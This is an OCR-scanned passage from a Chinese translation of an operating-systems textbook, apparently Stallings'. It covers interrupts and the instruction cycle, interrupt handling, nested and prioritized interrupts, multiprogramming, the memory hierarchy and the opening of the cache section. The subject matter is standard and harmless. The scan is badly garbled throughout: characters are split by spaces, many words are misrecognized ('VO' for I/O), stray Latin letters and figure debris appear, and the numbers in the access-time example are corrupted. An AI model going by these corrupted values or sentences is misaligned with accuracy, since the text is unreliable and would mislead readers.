中 断 最 初 是 用 于 提高 处 理 器 效率 的 一 种 手段 。 例 如 ,大 多 数 IO 设备 比 处 理 器 慢 得 多 , 假设 
处 理 器 使 用 如 图 1.2 所 示 的 指令 周期 方案 给 一 台 打 印 机 传送 数据 , 在 每 一 次 写 操 作 后 ， 处理 器 必 
须 暂 停 并 保持 空闲 , 直到 打印 机 完成 工作 。 暂停 的 时 间 长 度 可 能 相当 于 成 百 上 千 个 不 涉及 存储 器 
的 指令 周期 。 显 然 ， 这 对 于 处 理 器 的 使 用 来 说 是 非常 浪费 的 。 


表 1.1 中 断 的 分 类 
类 别 说 明 
在 某 些 条 件 下 由 指令 执行 的 结果 产生 ,例如 算术 溢出 、 除 数 为 0、 试 图 执行 一 条 非法 的 机 器 指令 





程序 中 断 以 及 访问 到 用 户 不 允许 的 存储 器 位 置 
时 钟 中 断 由 处 理 器 内 部 的 计时 器 产生 ， 人 允许 操作 系统 以 一 定 规律 执行 函数 
IO 中 断 由 IO 控制 器 产生 ， 用 于 发 信号 通知 一 个 操作 的 正常 完成 或 各 种 错误 条 件 


硬件 故障 中 断 由 诸如 掉 电 或 存储 器 奇偶 错误 之 类 的 故障 产生 


这 里 给 出 一 个 实例 , 假设 有 一 个 1GHz CPU 的 PC 机 , 大 约 每 秒 执行 10 条 指令 e。 一 个 典型 
的 硬盘 的 速度 是 7200 转 / 分 ,这样 大 约 旋转 半 转 的 时 间 是 4ms， 处 理 器 比 这 要 快 4 百 万 倍 。 

图 1.5a 显示 了 这 种 事件 状态 。 用 户 程序 在 处 理 过 程 中 交织 着 执行 一 系列 WRITE 调用 。 竖 实 
线 表 示 程 序 中 的 代码 段 ， 代 码 段 1、2 和 3 表示 不 涉及 VO 的 指令 序列 。WRITE 调用 要 执行 一 个 
VO 程序 ， 此 LO 程序 是 一 个 系统 工具 程序 , 由 它 执 行 真 正 的 VO 操作 。 此 IO 程序 由 三 部 分 组 成 : 


O 关于 数字 前 级 的 用 法 WA (Giga) MA ( Tera )， 请 参阅 位 于 WilliamStallings.com.StudentSupport.html 处 的 
Computer Science Student Resource Site 站 点 中 的 支持 文档 . 
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@ 图 中 标记 为 4 的 指令 序列 用 于 为 实际 的 VO 操作 做 准备 。 这 包括 复制 将 要 输出 到 特定 组 
冲 区 的 数据 ， 为 设备 命令 准备 参数 。 
@ 实际 的 IO 命令 。 如 果 不 使 用 中 断 ， 当 执行 此 命令 时 ， 程 序 必须 等 待 1/O 设备 执行 请 求 
到 (或 周期 性 地 检测 IO 设备 的 状态 或 轮 询 IO 设备 )。 FP TE LER 
一 个 测试 操作 的 方式 进行 等 待 ， 以 确定 WO 操作 是 否 完成 。 

















pod a 
WRITE M / | dg ent 
i TAS ia © i 
| i pan 
© i i Fa 结束 `, 
if 
WRITE / WRITE y 
i 
ol | 
i 
i @ 
+ 
WRITE WRITE fal 
a) 无 中 断 b ) 中 断 ; 短 时 间 VO 等 待 c) 中 断 ; 长 时 间 IO 等 待 


图 1.5 在 有 中 断 和 无 中 断 时 程序 的 控制 流 


@ 图 中 标记 为 5 的 指令 序列 ， 用 于 完成 操作 。 包 括 设置 一 个 表示 操作 成 功 或 失败 的 标记 。 

虚线 代表 处 理 器 执行 的 路 径 ; 也 就 是 说 ， 这 条 线 显 示 了 指令 执行 的 顺序 。 当 遇 到 第 一 条 
WRITE 指令 之 后 ， 用 户 程序 被 中 断 ，LIO 程序 开始 执行 。 在 IO 程序 执行 完成 后 ，WRITE 指令 
之 后 的 用 户 程 序 立即 恢复 执行 l 

由 于 完成 VO 操作 可 能 花费 较 长 的 时 间 ，LIO 程序 需要 挂 起 等 待 操作 完成 ， 因 此 用 户 程序 会 
在 WRITE 调用 处 停留 相当 长 的 一 段 时 间 。 


1.4.1 中断 和 指令 周期 


利用 中 断 功 能 ， 处 理 器 可 以 在 VO 操作 的 执行 过 程 中 执行 其 他 指令 。 考 虑 图 1.5b 所 示 的 控 
制 流 ， 和 前 面 一 样 ， 用 户 程序 到 达 系 统 调用 WRITE 处 ， 但 涉及 的 IO 程序 仅 包括 准备 代码 和 真 
TEM WO 命令。 在 这 些 为 数 不 多 的 几 条 指令 执行 后 ,控制 返回 到 用 户 程 序 。 在 这 期 间 ， 外 部 设备 
忙于 从 计算 机 存储 器 接收 数据 并 打印 。 这 种 IO 操作 和 用 户 程序 中 指令 的 执行 是 并 发 的 。 

当 外 部 设备 做 好 服务 的 准备 , 也 就 是 说 ， 当 它 准备 好 从 处 理 器 接收 更 多 的 数据 时 ,该 外 部 设 
备 的 VO 模块 给 处 理 器 发 送 一 个 中 断 请 求 信号 。 这 时 处 理 器 会 做 出 响应 ， 暂 停 当 前 程序 的 处 理 ， 
转 去 处 理 服务 于 特定 WO 设备 的 程序 ， 这 个 程序 称 做 中 断 处 理 程序 ( interrupt handler )。 在 对 该 
设备 的 服务 响应 完成 后 ， 处 理 器 恢复 原先 的 执行 。 图 1.5b 中 用 “ ”表示 发 生 中 断 的 点 。 注 意 ， 
中 断 可 以 在 主 程序 中 的 任何 位 置 发 生 ， 而 不 是 在 一 条 指定 的 指令 处 。 

从 用 户 程 序 的 角度 看 ， 中 断 打 断 了 正常 执行 的 序列 。 当 中 断 处 理 完成 后 ， 再 恢复 执行 ( 见 图 
1.6 Jo 因此， 用 户 程序 并 不 需要 为 中 断 添加 任何 特殊 的 代码 ， 处 理 器 和 操作 系统 负责 挂 起 用 户 程 


i iss B 
序 ， 然 后 在 同一 个 地 方 恢复 执行 


用 户 程序 中 断 处 理 器 
le 











Ms. 


图 1.6 通过 中 断 转 移 控制 


为 适应 中 断 产生 的 情况 ， 在 指令 周期 中 要 增加 一 个 中 断 阶段 ， 如 图 1.7 所 示 ( 与 图 1.2 对 照 )。 
在 中 断 阶段 中 ， 处 理 器 检查 是 否 有 中 断 发 生 ， 即 检查 是 否 出 现 中 断 信号 。 如 果 没 有 中 断 ， 处 理 器 
继续 运行 ， 并 在 取 指 周期 取 当 前 程序 的 下 一 条 指令 ; 如 果 有 中 断 ， 处 理 器 挂 起 当前 程序 的 执行 ， 
并 执行 一 个 中 断 处 理 程序 。 这 个 中 断 处 理 程序 通常 是 操作 系统 的 一 部 分 ， 它 确定 中 断 的 性 质 ， 并 
执行 所 需要 的 操作 。 例 如 ,在 前 面 的 例子 中 ,处 理 程序 决定 哪 一 个 1/O 模块 产生 中 汤 , 并 转 到 往 该 
LO 模块 中 写 更 多 数据 的 程序 。 当 中 断 处 理 程序 完成 后 ， 处 理 器 在 中 断 点 恢复 对 用 户 程 序 的 执行 。 


Ne 执行 阶段 





中 断 阶 段 








不 允许 中 断 





图 1.7 ”中断 和 指令 周期 


很 显然 , 在 这 个 处 理 中 有 一 定 的 开销 , 在 中 断 处 理 程序 中 必须 执行 额外 的 指令 以 确定 中 断 的 
性质 ， 并 决定 采用 适当 的 操作 。 然 而 ， PRA SG TO EERE SSB. 因此 
使 用 中 断 能 够 更 有 效 地 使 用 处 理 器 。 

为 进一步 理解 在 效率 上 的 烛 高 ,请 参阅 图 1.8, 它 是 关于 图 1.5a 和 图 1.5b 中 控制 流 的 时 序 图 。 
图 1.5b 和 图 1.8 假设 IO 操作 的 时 间 相 当 短 ， 小 于 用 户 程序 中 写 操作 之 间 完 成 指令 执行 的 时 间 。 
而 更 典型 的 情况 是 ， 特 别 是 对 比较 慢 的 设备 如 打印 机 来 说 ，UO 操作 比 执行 一 系列 用 户 指令 的 时 
间 要 长 得 多 , 图 1.5c 显示 了 这 类 事件 状态 。 在 这 种 情况 下 ,用户 程 序 在 由 第 一 次 调用 产生 的 VO 
操作 完成 之 前 ， 就 到 达 了 第 二 次 WRITE 调用 。 结 果 是 用 户 程 序 在 这 一 点 挂 起 ， 当 前 面 的 VO 操 
作 完 成 后 ， 才 能 继续 新 的 WRITE 调用 ， 也 才能 开始 一 次 新 的 10 操作 。 图 1.9 给 出 了 在 这 种 情 
况 下 使 用 中 断 和 不 使 用 中 断 的 时 序 图 , 我 们 可 以 看 到 IO 操作 在 未 完成 时 与 用 户 指令 的 执行 有 所 
重 人 。 由 于 这 部 分 时 间 的 存在 ， 效 率 仍然 有 所 提高 。 
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了 时间 ®© 
oe | vo set peg 
| 人 © 
oR VO 操作 
[vo m O) 
@ a 
oO I 
2 i 
= [vo wt IO 操作 
[own 图 Sa 
© 
a) 无 中 断 带 贺 轿 的 数字 b> EPR CHM RC a) 无 中 斯 〈 带 圆圈 的 数字 d Ari HMMS 
指 图 1.5a 中 的 数字 ) 指 图 1.5b 中 的 数字 ) 指 图 1.5a 中 的 数字 ) 指 图 1.5c 中 的 数字 ) 
图 1.8 程序 时 序 : 短 I/O 等 待 图 1.9 程序 时 序 : 长 IO 等 待 
1.4.2 ”中 断 处 理 


中 断 激 活 了 很 多 事件 ， 包 括 处 理 器 硬件 中 的 事件 以 及 软件 中 的 事件 。 图 1.10 显示 了 一 个 典 
型 的 序列 ， 当 IO 设备 完成 一 次 VO 操作 时 ， 发 生 下 列 硬件 事件 : 





1.10 ”简单 中 断 处 理 
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1) 设备 给 处 理 器 发 出 一 个 中 断 信 和 号 。 

2) 处 理 器 在 响应 中 断 前 结束 当前 指令 的 执行 ， 如 图 1.7 所 示 。 

3) 处 理 器 对 中 断 进行 测定 ， 确 定 存 在 未 响应 的 中 断 ， 并 给 提交 中 断 的 设备 发 送 确认 信号， 
确认 信号 允许 该 设备 取消 它 的 中 断 信号 。 

4) 处 理 器 需要 为 把 控制 权 转 移 到 中 断 程序 中 去 做 准备 。 首 先 ， 需 要 保存 从 中 断 点 恢复 当前 
程序 所 需要 的 信息 ， 要 求 的 最 少 信息 包括 程序 状态 字 (PSW) 和 保存 在 程序 计数 器 中 的 
下 一 条 要 执行 的 指令 地 址 ， 它 们 被 压 人 系统 控制 栈 ( 见 附录 1B) 中 。 

5 ) 处 理 器 把 响应 此 中 断 的 中 断 处 理 程序 人 口 地 址 装 人 程序 计数 器 中 。 可 以 针对 每 类 中 断 有 
一 个 中 断 处 理 程序 ， 也 可 以 针对 每 个 设备 和 每 类 中 断 各 有 一 个 中 断 处 理 程序 ， 这 取决 于 
计算 机 系统 结构 和 操作 系统 的 设计 。 如 果 有 多 个 中 断 处 理 程序 ， 处 理 器 就 必须 决定 调用 
哪 一 个 ， 这 个 信息 可 能 已 经 包含 在 最 初 的 中 断 信号 中 ， 否 则 处 理 器 必须 给 发 中 断 的 设备 
发 送 请 求 ， 以 获取 含有 所 需 信息 的 响应 。 

一 县 完成 对 程序 计数 器 的 装 入 , 处理 器 则 继续 到 下 一 个 指令 周期 , 该 指令 周期 也 是 从 取 指 开 

始 。 由 于 取 指 是 由 程序 计数 器 的 内 容 决定 的 , 因此 控制 被 转移 到 中 断 处 理 程序 ,该 程序 的 执行 引 
起 以 下 的 操作 : 

6) 在 这 一 点 , 与 被 中 断 程序 相关 的 程序 计数 器 和 PSW 被 保存 到 系统 栈 中 ,此 外 , 还 有 一 些 
其 他 信息 被 当做 正在 执行 程序 的 状态 的 一 部 分 。 特 别 需 要 保存 处 理 器 寄存 器 的 内 容 ， 因 
为 中 断 处 理 程序 可 能 会 用 到 这 些 寄存 器 ， 因 此 所 有 这 些 值 和 任何 其 他 的 状态 信息 都 需要 
保存 。 在 典型 情况 下 ， 中 断 处 理 程序 一 开始 就 在 栈 中 保存 所 有 的 寄存 器 内 容 ， 其 他 必须 
保存 的 状态 信息 将 在 第 3 章 中 讲述 。 图 1.11a 给 出 了 一 个 简单 的 例子 。 在 这 个 例子 中 ， 
用 户 程序 在 执行 地 址 为 N 的 存储 单元 中 的 指令 之 后 被 中 断 ， 所 有 寄存 器 的 内 容 和 下 一 条 
指令 的 地 址 (N+1), 一 共 M 个 字 , 被 压 人 控制 栈 中 。 栈 指针 被 更 新 指向 新 的 栈 顶 ,程序 
计数 器 被 更 新 指向 中 断 服务 程序 的 开始 。 

7) 中 断 处 理 程序 现在 可 以 开始 处 理 中 断 ， 其 中 包括 检查 与 VO 操作 相关 的 状态 信息 或 其 他 
引起 中 断 的 事件 ， 还 可 能 包括 给 WO 设备 发 送 附 加 命令 或 应 答 。 

8) 当中 断 处 理 结束 后 ， 被 保存 的 寄存 器 值 从 栈 中 释放 并 恢复 到 寄存 器 中 ， 如 图 1.11b 所 示 。 

9) 最 后 的 操作 是 从 栈 中 恢复 PSW 和 程序 计数 器 的 值 ， 其 结果 是 下 一 条 要 执行 的 指令 来 自 
前 面 被 中 断 的 程序 。 

保存 被 中 断 程 序 的 所 有 状态 信息 并 在 以 后 恢复 这 些 信 息 , 这 是 十 分 重要 的 , 这 是 由 于 中 断 并 

不 是 程序 调用 的 一 个 例 程 , 它 可 以 在 任何 时 候 发 生 , 因而 可 以 在 用 户 程序 执行 过 程 中 的 任何 一 点 
上 发 生 ， 它 的 发 生 是 不 可 预测 的 。 


1.4.3 SS Pe 


至 此 , 我 们 已 讨论 了 发 生 一 个 中 断 的 情况 。 假 设 一 下 , 当 正 在 处 理 一 个 中 断 时 ， 可 以 发 生 一 
个 或 者 多 个 中 断 , 例如 , 一 个 程序 可 能 从 一 条 通信 线 中 接收 数据 并 打印 结果 。 每 完成 一 个 打印 操 
E, 打印 机 就 会 产生 一 个 中 断 ; 每 当 一 个 数据 单元 到 达 , 通信 线 控制 器 也 会 产生 一 个 中 断 。 数 据 
单元 可 能 是 一 个 字符 ， 也 可 能 是 连续 的 一 块 字符 串 ,， 这 取决 于 通信 规则 本 身 。 在 任何 情况 下 ,都 
有 可 能 在 处 理 打印 机 中 断 的 过 程 中 发 生 一 个 通信 中 断 。 

处 理 多 个 中 断 有 两 种 方法 。 第 一 种 方法 是 当 正 在 处 理 一 个 中 断 时 ， 禁 止 再 发 生 中 断 。 禁 
焉 中 断 的 意思 是 处 理 器 将 对 任何 新 的 中 断 请求 信 号 不 予 理 辽 。 如 果 在 这 期 间 发 生 了 中 断 ， 通 
常 中 断 保持 挂 起 ， 当 处 理 器 再 次 允许 中 断 时 ， 再 由 处 理 器 检查 。 因 此 ， 当 用 户 程序 正在 执行 
并 且 有 一 个 中 断 发 生 时 ,立即 禁止 中 断 ; 当中 断 处 理 程序 完成 后 ， 在 恢复 用 户 程 序 之 前 再 允 
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许 中 断 ， 并 且 由 处 理 器 检查 是 否 还 有 中 断 发 生 。 这 个 方法 很 简单 ， 因 为 所 有 中 汤 都 严格 按 顺 
序 处 理 ( OLA 1.12a )。 


ba 


[| 务 例 程 





Y+L 


Sa 
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内 存 
a) 在 存储 单元 N 中 的 指令 之 后 发 生 中 斯 b) 从 中 断 返回 


图 1.11 因 中 断 而 产生 的 存储 器 和 寄存 器 中 的 变化 


上 述 方法 的 缺点 是 没有 考虑 相对 优先 级 和 时 间 限 制 的 要 求 。 例 如 , 当 来 自 通信 线 的 输入 到 达 
时 ,可 能 需要 快速 接收 ， 以 便 为 更 多 的 输入 让 出 空间 。 如 果 在 第 二 批 输入 到 达 时 第 一 批 还 没有 处 
理 完 ， 就 有 可 能 由 于 IO 设备 的 缓冲 区 装 满 或 溢出 而 丢失 数据 。 

第 二 种 方法 是 定义 中 断 优先 级 ， 允 许 高 优先 级 的 中 断 打 斯 低 优先 级 的 中 斯 处 理 程 序 的 运行 
(RE 1.12b )。 第 二 种 方法 的 例子 如 下 ,假设 一 个 系统 有 三 个 VORB: TN. RAMA, 
优先 级 依次 为 2、4 和 5，, 图 1.13 给 出 了 可 能 的 顺序 [TANE06]。 用 户 程序 在 =0 时 开始 ,在 t10 
BY, 发 生 一 个 打印 机 中 断 ; 用 户 信息 被 放置 到 系统 栈 中 并 开始 执行 打印 机 中 断 服 务 例 程 (Interrupt 
Service Routine, ISR); 当 这 个 例 程 仍 在 执行 时 , 在 15 时 发 生 了 一 个 通信 中 断 ， 由 于 通信 线 的 
优先 级 高 于 打印 机 ， 必 须 处 理 这 个 中 断 ， 打 印 机 ISR 被 打 断 ， 其 状态 被 压 人 栈 中 ， 并 开始 执行 
通信 ISR; 当 这 个 程序 正在 执行 时 ， 又 发 生 了 一 个 磁盘 中 断 ( 拓 20 )， 由 于 这 个 中 断 的 优先 级 比 
较 低 ， 它 被 简单 地 挂 起， 通信 ISR 运行 直到 结束 。 

当 通 信 ISR 完成 后 〈 大 25 )， 恢 复 以 前 关于 执行 打印 机 ISR 的 处 理 器 状态 。 但 是 ， 在 执行 这 
个 例 程 中 的 任何 一 条 指令 前 , 处 理 器 必须 完成 高 优先 级 的 磁盘 中 断 , 这 样 控制 权 转 移 给 磁盘 ISR. 

只 有 当 这 个 例 程 也 完成 时 (大 35 )， 才 恢复 打印 机 ISR。 当 打印 机 ISR mane (40), BRR 
返回 到 用 户 程序 。 
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MES 四 用 户 程序 中 断 处 理 器 
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图 1.13 ”多 中 断 的 时 间 顺 序 


1.4.4 多 道 程序 设计 


即使 使 用 了 中 断 ， 处 理 器 仍 有 可 能 未 得 到 有 效 的 利用 ， 例 如 ， 图 1.9b 曾 用 于 说 明 处 理 器 在 
长 VO 等 待 下 的 使 用 率 ， 但 如 果 完 成 1/O 操作 的 时 间 远 远大 于 IO 调用 期 间 用 户 代 码 的 执行 时 间 
(通常 情况 下 ), 则 在 大 部 分 时 间 处 理 器 是 空闲 的 。 解 决 这 个 问题 的 方法 是 允许 多 道 用 户 程序 同时 
处 于 活动 状态 。 

假设 处 理 器 执行 两 道 程序 。 一道 程 序 从 存储 器 中 读数 据 并 放 人 外 部 设备 中 , 另 一 道 是 包括 大 
量 计算 的 应 用 程序 。 处理 器 开始 执行 输出 程序 , 给 外 部 设备 发 送 一 个 写 命令 , 接着 开始 执行 其 他 
应 用 程序 。 当 处 理 器 处 理 很 多 程序 时 , 执行 顺序 取决 于 它们 的 相对 优先 级 以 及 它们 是 否 正在 等 待 
WO。 当 一 个 程序 被 中 断 时 ， 控 制 权 转移 给 中 断 处 理 程 序 ， 一 旦 中 断 处 理 程序 完成 控制 权 可 能 
并 不 立即 返回 到 这 个 用 户 程序 , 而 可 能 转移 到 其 他 待 运行 的 具有 更 高 优先 级 的 程序 。 最 终 ， 当 原 
先 被 中 断 的 用 户 程序 变 为 最 高 的 优先 级 时 , 它 将 被 重新 恢复 执行 。 这 种 多 道 程序 轮流 执行 的 概念 
称 做 多 道 程序 设计 ， 第 2 章 将 进一步 对 此 进行 讨论 。 


1.5 ”存储 器 的 层次 结构 


计算 机 存储 器 的 设计 目标 可 以 归纳 成 三 个 问题 : 多 大 的 容量 ? 多 快 的 速度 ? 多 贵 的 价格 ? 
“多 大 的 容量 ”的 问题 从 某 种 意义 上 来 说 是 无 止境 的 ， 存 储 器 有 多 大 的 容量 ， 就 可 能 开发 出 


> 
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相应 的 应 用 程序 使 用 它 。“ 多 快 的 速度 ”的 问题 相对 易于 回答 ， 为 达到 最 佳 的 性 能 ， 存 储 器 的 速 
度 必 须 能 够 跟 得 上 处 理 器 的 速度 。 换 言 之 , 当 处 理 器 正在 执行 指令 时 , 我 们 不 希望 它 会 因为 等 待 
指令 或 操作 数 而 暂停 。 最 后 一 个 问题 也 必须 考虑 ， 对 一 个 实际 的 计算 机 系统 , 存储 器 的 价格 与 计 
算 机 其 他 部 件 的 价格 相 比 应 该 是 合理 的 。 

应 该 认识 到 , 存储 器 的 这 三 个 重要 特性 间 存 在 着 一 定 的 折衷 ， 即 容量 、 存 取 时 间 和 价格 。 在 
任何 时 候 ， 实 现存 储 器 系统 会 用 到 各 种 各 样 的 技术 ， 但 各 种 技术 之 间 往 往 存在 着 以 下 关系 : 

o 存 取 时 间 越 快 ， 每 一 个 “位 ”的 价格 越 高 。 

@ 容量 越 大 ， 每 一 个 “位 ”的 价格 越 低 。 

@ 容量 越 大 ， 存 取 速 度 越 慢 。 

设计 者 面临 的 困难 是 很 明显 的 , 由 于 需求 是 较 大 的 容量 和 每 一 个 “位 ” 较 低 的 价格 ， 因 而 设 
计 者 通常 希望 使 用 能 够 提供 大 容量 存储 的 存储 器 技术 。 但 是 为 满足 性 能 要 求 , 又 需要 使 用 昂贵 的 、 
容量 相对 比较 小 而 具有 快速 存 取 时 间 的 存储 器 。 

解决 这 个 难题 的 方法 是 , 不 依赖 于 单一 的 存储 组 件 或 技术 , 而 是 使 用 存储 器 的 层次 结构 。 一 
种 典型 的 层次 结构 如 图 1.14 所 示 。 当 沿 这 个 层次 结构 从 上 向 下 看 ,会 得 到 以 下 情况 : 

a) 每 一 个 “位 ”的 价格 递减 

b ) 容量 递增 

c) 存 取 时 间 递 增 

d) 处 理 器 访问 存储 器 的 频率 递减 

因此 ,容量 较 大 、 价 格 较 便宜 的 慢 速 存储 器 是 容量 较 小 、 价 格 较 贵 的 快速 存储 器 的 后 备 。 这 
种 存储 器 的 层次 结构 能 够 成 功 的 关键 在 于 低层 访问 频率 递减 。 在 本 章 后 面部 分 讲解 高 速 缓存 
(cache) 时 ， 以 及 在 本 书后 面 讲解 虚拟 内 存 时 ， 将 详细 分 析 这 个 概念 ， 这 里 只 给 出 简要 说 明 。 

假设 处 理 器 存 取 两 级 存储 器 ， 第 一 级 存储 器 容量 为 1 000 个 字 节 ， 存 取 时 间 为 0.1hs; 第 二 
级 存储 器 包含 100 000 CFF, FREA lus 。 假 如 需要 存 取 第 一 级 存储 器 中 的 一 个 字 节 ， 则 
处 理 器 可 直接 存 取 此 字 节 ; 如 果 这 个 字 节 位 于 第 二 级 存储 器 , 则 此 字 节 首先 需要 转移 到 第 一 级 存 
储 器 中 , 然后 再 由 处 理 器 存 取 。 为 简单 起 见 , 我 们 忽略 了 处 理 器 用 于 确定 这 个 字 节 是 在 第 一 级 存 
储 器 还 是 在 第 二 级 存储 器 所 需 的 时 间 。 图 1.15 给 出 了 反映 这 种 模型 的 一 般 曲 线形 状 。 此 图 表示 
了 二 级 存储 器 的 平均 存 取 时 间 是 命中 率 AMR, H 定义 为 对 较 快 存储 器 (如 高 速 缓存 ) 的 访 
问 次 数 与 对 所 有 存储 器 的 访问 次 数 的 比值 ，T 是 访问 第 一 级 存储 器 的 存 取 时 间 ，7 是 访问 第 二 
级 存储 器 的 存 取 时 间 S。 可 以 发 现 ， 当 第 一 级 存储 器 的 存 取 次 数 所 占 比 例 较 高 时 ， 总 的 平均 存 取 
时 间 更 接近 于 第 一 级 存储 器 的 存 取 时 间 而 不 是 第 二 级 存储 器 的 存 取 时 间 。 

例如 ,假设 有 95% 的 存储 器 存 取 (=0.95 ) 发 生 在 高 速 缓存 中 ， 则 访问 一 个 字 节 的 平均 存 取 
时 间 可 表示 为 : 

(0.95) (Olus) + (0.05) (0.1ns+lhs) = 0.095 + 0.055 = 0.15ps 

此 结果 非常 接近 于 快速 存储 器 的 存 取 时 间 。 因 此 仅 当 条 件 a) 到 d) 适用 时 ， 原 则 上 可 以 实 
现 该 策略 。 通 过 使 用 各 种 技术 手段 ， 现 有 的 存储 器 系统 满足 条 件 a) 到 c)， 而 且 条 件 d ) 通常 也 
是 有 效 的 。 

条 件 d) 有 效 的 基础 是 访问 的 局 部 性 原理 [ DENN68 ]。 在 执行 程序 期 间 ， 处 理 器 的 指令 访 存 
和 数据 访 存 呈现 “ 簇 ” 状 ( 指 -一 组 数据 集合 )。 典 型 的 程序 包含 许多 和 迭代 循环 和 子 程序 ， 一 旦 程 
序 进入 一 个 循环 或 子 程序 执行 , 就 会 重复 访问 一 个 小 范围 的 指令 集合 。 同 理 , 对 表 和 数组 的 操作 
HU REM “Rh” 数据 。 经 过 很 长 的 一 段 时 间 , 程序 访问 的 “ 簇 ” 会 改变 ,但 在 较 短 的 时 间 内 ，， 


O 若 在 快速 存储 器 中 找到 了 存 取 的 字 ， 则 定义 为 命中 ; 若 在 快速 存储 器 中 未 找到 存 取 的 字 ， 则 定义 为 不 命中 。 
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处 理 器 主要 访问 存储 器 中 国定 的 “能 ”。 





Ti+T2 


Tz 


平均 存 取 时 间 


Tı 





0 
| 仅 涉及 第 一 级 的 存 取 部 分 命中 率 ) 
图 1.14 存储 器 的 层次 结构 1.15 一 个 简单 的 二 级 存储 器 的 性 能 


因此 , 可 以 通过 层次 组 织 数据 , 使 得 随 着 组 织 层 次 的 递减 , 对 各 层次 的 访问 比例 也 依次 递减 。 
考虑 前 面 提 到 的 二 级 存储 器 的 例子 ， 让 第 二 级 存储 器 包含 所 有 的 指令 和 数据 ， 程 序 当前 的 访问 
“ 簇 ” 暂 时 存放 在 第 一 级 存储 器 中 。 有 时 第 一 级 存储 器 中 的 某 个 簇 要 换 出 到 第 二 级 存储 器 中 ， 以 
便 为 新 的 “人 能 ”进入 第 一 级 存储 器 让 出 空间 。 但 平均 起 来 ,大 多 数 存 储 访问 是 对 第 一 级 存储 器 中 
的 指令 和 数据 的 访问 。 

此 原理 可 以 应 用 于 多 级 存储 器 组 织 结构 中 。 最 快 、 最 小 和 最 贵 的 存储 器 类 型 由 位 于 处 理 器 内 部 
的 寄存 器 组 成 。 在 典型 情况 下 ， 一 个 处 理 器 包含 多 个 寄存 器 ， 某 些 处 理 器 包含 上 百 个 寄存 器 。 向 下 
跳 过 两 级 存储 器 层次 就 到 了 内 存 层次 ， 内 存 是 计算 机 中 主要 的 内 部 存储 器 系统 。 内 存 中 的 每 个 单元 
位 置 都 有 一 个 唯一 的 地 址 对 应 ， 而 且 大 多 数 机 器 指令 会 访问 一 个 或 多 个 内 存 地 址 。 内 存 通常 是 高 速 
的 、 容 量 较 小 的 高 速 缓存 的 扩展 。 离 速 缓存 通常 对 程序 员 不 可 见 ， 或 者 更 确切 地 说 ， 是 对 处 理 器 不 
可 见 。 高 速 缓存 用 于 在 内 存 和 处 理 器 的 寄存 器 之 间 分 段 移 动 数 据 ， 以 提高 数据 访问 的 性 能 。 

前 面 描述 的 三 种 形式 的 存储 器 通常 是 易 失 的 ， 并 且 采 用 的 是 半导体 技术 。 半 导体 存储 器 有 各 
种 类 型 ， 它 们 的 速度 和 价格 各 不 相同 。 数 据 更 多 的 是 永久 保存 在 外 部 海量 存储 设备 中 ， 通 常 是 硬 
盘 和 可 移动 的 储存 介质 ， 如 可 移动 磁盘 、 磁 带 和 光 存 储 介 质 。 外 部 的 、 非 易 失 性 的 存储 器 也 称 为 
二 级 存储 器 ( secondary memory ) 或 辅助 存储 器 ( auxiliary memory )， 它 们 用 于 存储 程序 和 数据 文 
4, 其 表现 形式 是 程序 员 可 以 看 到 的 文件 和 记录 , 而 不 是 单个 的 字 节 或 字 。 硬盘 还 用 作 内 存 的 扩展 ， 
即 虚拟 存储 器 (virtual memory )， 这 方面 的 内 容 将 在 第 8 章 讲述 。 

在 软件 中 还 可 以 有 效 地 增加 额外 的 存储 层次 。 例 如 ， 一 部 分 内 存 可 以 作为 缓冲 区 (buffer), 
用 于 临时 保存 从 磁盘 中 读 出 的 数据 。 这 种 技术 ， 有 时 称 为 磁盘 高 速 缓存 (将 在 第 11 章 中 详细 讲 
述 )， 可 以 通过 两 种 方法 提高 性 能 : 

© 磁盘 成 科 写 。 即 采用 次 数 少 、 数 据 量 大 的 传输 方式 ， 而 不 是 次 数 多 、 数 据 量 小 的 传输 方 

式 。 选 择 整 批 数据 一 次 传输 可 以 提高 磁盘 的 性 能 ， 同 时 减少 对 处 理 器 的 影响 。 
o 一 些 注定 要 “ 写 出 ”( write-out ) 的 数据 也 许 会 在 下 一 次 存储 到 磁盘 之 前 被 程序 访问 到 。 在 此 
情况 下 ， 数 据 能 够 迅速 地 从 软件 设置 的 磁盘 高 速 缓存 中 取出 ， 而 不 是 从 缓慢 的 磁盘 中 取 回 。 
附录 1A 分 析 了 多 级 存储 器 结构 的 性 能 。 
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尽管 高 速 缓 存 对 操作 系统 是 不 可 见 的 , 但 它 与 其 他 存储 管理 硬件 相互 影响 。 此 外 , 很 多 用 于 
虚拟 存储 (将 在 第 8 章 讲解 ) 的 原理 也 可 以 用 于 高 速 缓存 。 


1.6.1 动机 


. 在 全 部 指令 周期 中 ， 处 理 器 在 取 指 令 时 至 少 访问 一 次 存储 器 ， 而 且 通 常 还 要 多 次 访问 存储 器 用 
于 取 操 作 数 或 保存 结果 。 处 理 器 执行 指令 的 速度 显然 受 存储 周期 ( 从 存储 器 中 读 一 个 字 或 写 一 个 字 
到 存储 器 中 所 花 的 时 间 ) 的 限制 。 长 期 以 来 ， 由 于 处 理 器 和 内 存 的 速度 不 匹配 ， 这 个 限制 已 经 成 
为 很 严重 的 间 题 。 近 年 来 ， 处 理 器 速度 的 提高 一 直 快 于 存储 器 访问 速度 的 提高 ， 这 需要 在 速度 、 
价格 和 大 小 之 间 进 行 折 囊 。 理 想 情 况 下 ， 内 存 的 构造 技术 可 以 采用 与 处 理 器 中 的 寄存 器 相同 的 构造 
技术 ,这样 主 存 的 存储 周期 才 跟 得 上 处 理 器 周期 。 但 这 样 成 本 太 高 ， 解 决 的 方法 是 利用 局 部 性 原理 
( principle of locality ), 即 在 处 理 器 和 内 存 之 间 提 供 一 个 容量 小 而 速度 快 的 存储 器 , KHMER. 


1.6.2 高速 绥 存 原理 


高 速 缓存 试图 使 访问 速度 接近 现 有 最 快 的 存储 器 ， 同 时 保持 价格 便宜 的 大 存储 容量 ( 以 较为 
便宜 的 半导体 存储 器 技术 实现 )。 图 1.16 说 明了 这 个 概念 , 图 中 有 一 个 相对 容量 大 而 速度 比较 慢 的 
内 存 和 一 个 容量 较 小 且 速 度 较 快 的 高 速 缓 存 ， 高 速 缓存 包含 一 部 分 内 存 数 据 的 副本 。 当 处 理 器 试 
图 读 取 存 储 器 中 的 一 个 字 节 或 字 时 ， 要 进行 一 次 检查 以 确定 这 个 字 节 或 字 是 否 在 高 速 缓 存 中 。 如 
果 在 ， 该 字 节 或 字 从 高 速 缓存 传递 给 处 理 器 ; 如 果 不 在 ， 则 由 固定 数目 的 字 节 组 成 的 一 块 内 存 数 
